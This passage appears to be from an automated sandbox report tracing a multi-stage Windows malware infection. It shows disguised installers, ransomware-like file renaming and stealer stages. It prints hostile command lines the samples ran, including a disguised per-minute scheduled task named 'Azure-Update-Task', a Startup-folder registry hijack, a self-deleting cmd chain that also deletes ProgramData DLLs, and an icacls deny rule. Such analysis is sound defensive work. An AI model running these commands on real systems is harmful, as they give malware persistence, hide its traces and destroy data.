                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        PID:5596
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                      PID:5124
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:6832
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                            PID:7088
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                PID:6076
                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                PID:5500
                                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                PID:7704
                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 6EFDD2C0CEDE42B3BB68EFD3147E8F76 C
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:7220
                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 5B952D1B816159B0B89726B6D01C4D14 C
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:8448
                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 246F463C04EBC9B637F91477E68F6612 C
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:9048
                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 7E1E18AB35F5E84DF6E9AB8435613347
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:8508
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                  PID:9300
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                    PID:9524
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--Ac4FtzsAeC"
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                      PID:8548
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1a4,0x1e4,0x1e8,0x1c8,0x1ec,0x7ffda7b09ec0,0x7ffda7b09ed0,0x7ffda7b09ee0
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:7132
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --mojo-platform-channel-handle=1708 /prefetch:8
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:9304
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1648 /prefetch:2
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:8976
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --mojo-platform-channel-handle=2160 /prefetch:8
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:7184
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:1
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                PID:9568
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --mojo-platform-channel-handle=3036 /prefetch:8
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:4132
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1796 /prefetch:2
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:9584
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --mojo-platform-channel-handle=1856 /prefetch:8
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:9128
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --mojo-platform-channel-handle=3268 /prefetch:8
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:5636
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --mojo-platform-channel-handle=3128 /prefetch:8
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:8536
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,8388290545374204432,11793389449657545049,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_169160168" --mojo-platform-channel-handle=2260 /prefetch:8
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:5732
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_3.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                        PID:9488
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                    PID:7292
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                      PID:4868
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                    PID:8988
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                      PID:6300
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FDBB.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\FDBB.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                    PID:6524
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FDBB.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\FDBB.exe
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                                                      PID:8432
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                        icacls "C:\Users\Admin\AppData\Local\7747ff0d-3ccd-404a-adda-1eed913d306e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                        PID:4364
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\FDBB.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\FDBB.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                        PID:1140
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FDBB.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\FDBB.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Modifies extensions of user files
                                                                                                                                                                                                                                                                                          PID:6844
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\1c56cc9b-12f4-4b80-9ff7-b7b93b647629\build2.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\1c56cc9b-12f4-4b80-9ff7-b7b93b647629\build2.exe"
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                            PID:1452
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\1c56cc9b-12f4-4b80-9ff7-b7b93b647629\build2.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\1c56cc9b-12f4-4b80-9ff7-b7b93b647629\build2.exe"
                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                              PID:9204
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\1c56cc9b-12f4-4b80-9ff7-b7b93b647629\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                  PID:6940
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                    taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                    PID:8724
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                    PID:7740
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\1c56cc9b-12f4-4b80-9ff7-b7b93b647629\build3.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\1c56cc9b-12f4-4b80-9ff7-b7b93b647629\build3.exe"
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                              PID:6628
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\1c56cc9b-12f4-4b80-9ff7-b7b93b647629\build3.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\1c56cc9b-12f4-4b80-9ff7-b7b93b647629\build3.exe"
                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                  PID:5936
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                    PID:1200
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                        PID:6480
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\156B.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\156B.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:9184
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                          PID:8572
                                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:3224
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                              DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4509d74d-550c-344c-bee7-f43c8499af72}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                              PID:8668
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                              DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                              PID:3632
                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:8944
                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:1680
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                PID:4452
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                  PID:6068
                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:808
                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                  PID:9148
                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                  PID:6132
                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                    MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                    PID:9396
                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                  PID:7128
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\B8DF.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\B8DF.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                  PID:8516
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:6680
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E196.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E196.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:6916
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:8216
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                            PID:7756
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
